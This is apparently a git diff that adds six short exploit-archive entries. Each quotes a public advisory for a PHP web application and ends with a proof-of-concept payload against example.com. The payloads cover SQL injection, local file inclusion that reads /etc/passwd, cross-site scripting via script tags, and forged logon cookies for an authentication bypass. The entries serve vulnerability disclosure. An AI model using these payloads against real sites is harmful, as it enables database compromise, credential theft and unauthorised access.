diff --git a/platforms/php/webapps/30997.txt b/platforms/php/webapps/30997.txt
new file mode 100755
index 000000000..d95625b7d
--- /dev/null
+++ b/platforms/php/webapps/30997.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27173/info
+   
+eTicket is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues, a cross-site scripting issue, and an authentication-bypass issue.
+   
+A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user.
+   
+These issues affect eTicket 1.5.5.2; other versions may also be affected.
+
+http://www.example.com/eTicket/admin.php?a=headers&msg=SQL&#039;
\ No newline at end of file
diff --git a/platforms/php/webapps/31000.txt b/platforms/php/webapps/31000.txt
new file mode 100755
index 000000000..77a0c9984
--- /dev/null
+++ b/platforms/php/webapps/31000.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27184/info
+
+SysHotel On Line System is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. 
+
+http://www.example.com/index.php?file==%2Fetc%2Fpasswd 
\ No newline at end of file
diff --git a/platforms/php/webapps/31001.txt b/platforms/php/webapps/31001.txt
new file mode 100755
index 000000000..4e1c8579d
--- /dev/null
+++ b/platforms/php/webapps/31001.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27189/info
+
+IceWarp Mail Server is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects IceWarp Mail Server 9.1.1 for Windows; other versions may also be affected. 
+
+http://www.example.com:32000/admin/index.html?message=<script src="your-js.js"></script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/31003.txt b/platforms/php/webapps/31003.txt
new file mode 100755
index 000000000..d5d635a03
--- /dev/null
+++ b/platforms/php/webapps/31003.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27210/info
+
+Omegasoft Insel is prone to an authentication bypass vulnerability and a user-enumeration weakness.
+
+An attacker can exploit these issues to obtain sensitive information and gain unauthorized access to the application.
+
+These issues affect Omegasoft Insel 7; other versions may also be affected. 
+
+Cookiename: OMEGALogon
+value:[MANDATOR]%7C[CUSTOMERNUMBER]%7C[USERID]%7C%7CArial%7CArial%7C%2D%2D%2D%2D%2D%2D%7C[SURNAME]%2C+[NAME]%7C%7C%7C[LASTLOGINTIME]%7C
+
+Cookiename: OMEGA[MANDATOR]
+value: [USERID]%7C[CUSTOMERNUMBER]%7[HOST]%7C[DATE]%7C 
\ No newline at end of file
diff --git a/platforms/php/webapps/31008.txt b/platforms/php/webapps/31008.txt
new file mode 100755
index 000000000..357e13e5c
--- /dev/null
+++ b/platforms/php/webapps/31008.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27218/info
+
+Joomla-SMF Forum is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The issues affect SMF 1.1.4; other versions of SMF and Joomla-SMF may also be vulnerable. 
+
+http://www.example.com/component/option,com_smf/Itemid,8'XSS,1/topic,1.0/
+http://www.example.com/component/option,com_smf/Itemid,5/topic,1.XSS/ 
\ No newline at end of file
diff --git a/platforms/php/webapps/31009.txt b/platforms/php/webapps/31009.txt
new file mode 100755
index 000000000..ad8756b29
--- /dev/null
+++ b/platforms/php/webapps/31009.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27220/info
+
+ID-Commerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/liste.php?idFamille=1%20or%201=1#
+http://www.example.com/liste.php?idFamille=1%20or%201=0# 
\ No newline at end of file